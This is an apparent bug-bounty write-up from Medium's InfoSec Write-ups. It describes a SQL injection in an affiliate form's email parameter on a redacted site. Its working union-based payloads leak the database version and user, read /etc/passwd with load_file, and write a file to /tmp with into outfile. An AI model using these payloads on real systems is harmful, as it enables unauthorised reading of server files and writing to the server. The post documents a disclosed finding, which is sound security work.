SQL injection with load file and into outfile

NoGe
NoGe
Feb 5, 2018 · 2 min read

Well this submission make me get the patient badge on h1 coz it’s more then 6 month (1 year) hehehehehe. I got sqli vulnerability when test with apostrophe (‘). Sorry for the redacted guys. 😛

I do register as affiliate on the web as usual.

Then got redirect to POST all form information here https://www.blablabla.com/svc/*****/form_affiliate. Select it and send to repeater. The vulnerable parameter is email.

On request box, i input this SQL command in “email” parameter ‘ and 1=2 union all select concat_ws(0x3a,version(),user(),database()) — and click Go (this command will show version, user and database name)

The result is shown on response box “5.5.41-log:root@10.130.*.**:tp_cart”. Now i try to change the SQL command with this load file command ‘ and 1=2 union all select load_file(‘/etc/passwd’) and boom! got the passwd.

Change the load file command with into outfile command to create a file on /tmp ‘ and 1=2 union all select ‘blablabla_bug_bounty_program’ into outfile ‘/tmp/blablabla’ — that command means write blablabla_bug_bounty_program into blablabla file on /tmp directory.

Now i use load file again to see the file is created or not using this command ‘ and 1=2 union all select load_file(‘/tmp/blablabla’)

And it’s created successfully! So i got sqli and also can create a file on the server.

Happy hacking guys! 😃

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

NoGe

Written by

NoGe

researcher | #mufc

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

NoGe

Written by

NoGe

researcher | #mufc

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store